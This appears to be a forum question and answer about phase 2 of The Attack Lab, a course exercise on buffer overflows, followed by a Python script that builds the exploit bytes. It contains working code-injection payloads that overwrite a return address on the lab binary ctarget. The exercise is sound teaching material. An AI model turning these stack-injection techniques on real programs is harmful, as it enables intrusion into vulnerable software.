Buffer overflow attack (The Attack Lab phase 2)


Problem description


I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten to the point where the output says that it's a valid solution for phase 2, but then it says I caused a seg fault and then says I failed the phase.

This is the error message I get:

cookie:  0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED


This is my exploit code in assembly:

movq $0x2d6fc2d5, %rdi   # load the cookie into the first argument register (encoded as 48 c7 c7 d5 c2 6f 2d below)
retq                     # pop the next stack slot into %rip (encoded as c3)


This is what I pass into the program:

48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code (8 bytes)
00 00 00 00 00 00 00 00 #padding: 8 bytes of code + 48 bytes of zeros = 0x38 bytes, the offset of the saved return address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #overwritten return address: start of the buffer (rsp - 0x38), where the injected code sits
0d 18 40 00 00 00 00 00 #address of touch2(), placed in the slot after the return address so retq lands on it


I've looked at tutorials online and have been working on this for hours, but I haven't found a solution and I'm not sure what's causing the issue. It says the solution is valid, but then seg faults and fails. Any help would be greatly appreciated, and let me know if there's anything that needs clarifying!

Recommended answer


It seems the attack lab has been tweaked recently. You should avoid overwriting the next part after the return address on the stack.


Instead, you can use the push instruction to add values to the stack. Try removing the touch2 address from the input and use the following code.

mov $0x2d6fc2d5, %rdi    # cookie into the first argument register
pushq $0x40180d          # push the address of touch2() from inside the injected code instead of from the input
ret                      # pop that address into %rip, so the input ends at the return address
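To make the difference between the two layouts concrete, here is an added example (not part of the original question or answer) that encodes both versions of the injected code with the offsets and addresses quoted in the question, and checks how many bytes each input writes past the 8-byte return-address slot. The addresses are taken from the question and are specific to that build of ctarget; the constants and function names are this example's own.

```python
import struct

# Values quoted in the question (specific to that ctarget build).
RET_OFFSET = 0x38        # bytes from the start of the buffer to the saved return address
BUF_ADDR = 0x5566bd68    # start of the buffer, which the question writes over the return address
TOUCH2_ADDR = 0x40180d   # address of touch2()
COOKIE = 0x2d6fc2d5      # the question's cookie
RET = b"\xc3"            # ret / retq


def movq_imm32_rdi(imm):
    """Encode `movq $imm, %rdi` as REX.W c7 /0 with a sign-extended imm32 (48 c7 c7 + imm)."""
    assert 0 <= imm < 0x80000000, "imm32 is sign-extended; larger values need another encoding"
    return b"\x48\xc7\xc7" + struct.pack("<I", imm)


def pushq_imm32(imm):
    """Encode `pushq $imm` as opcode 68 followed by a sign-extended imm32."""
    assert 0 <= imm < 0x80000000
    return b"\x68" + struct.pack("<I", imm)


def layout_from_question():
    """Question's layout: code, zero padding up to the return address, buffer address, then touch2's address."""
    code = movq_imm32_rdi(COOKIE) + RET
    return code.ljust(RET_OFFSET, b"\x00") + struct.pack("<Q", BUF_ADDR) + struct.pack("<Q", TOUCH2_ADDR)


def layout_from_answer():
    """Answer's layout: the injected code pushes touch2's address itself, so the input ends at the return address."""
    code = movq_imm32_rdi(COOKIE) + pushq_imm32(TOUCH2_ADDR) + RET
    return code.ljust(RET_OFFSET, b"\x00") + struct.pack("<Q", BUF_ADDR)


def bytes_past_return_address(payload):
    """How many bytes of the input land beyond the 8-byte return-address slot (0 means none)."""
    return max(0, len(payload) - (RET_OFFSET + 8))


def to_hex_text(payload):
    """Render as the space-separated hex form shown in the question."""
    return " ".join(f"{b:02x}" for b in payload)


if __name__ == "__main__":
    for name, payload in (("question", layout_from_question()), ("answer", layout_from_answer())):
        print(f"{name}: {len(payload)} bytes, {bytes_past_return_address(payload)} past the return address")
        print(to_hex_text(payload))
```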
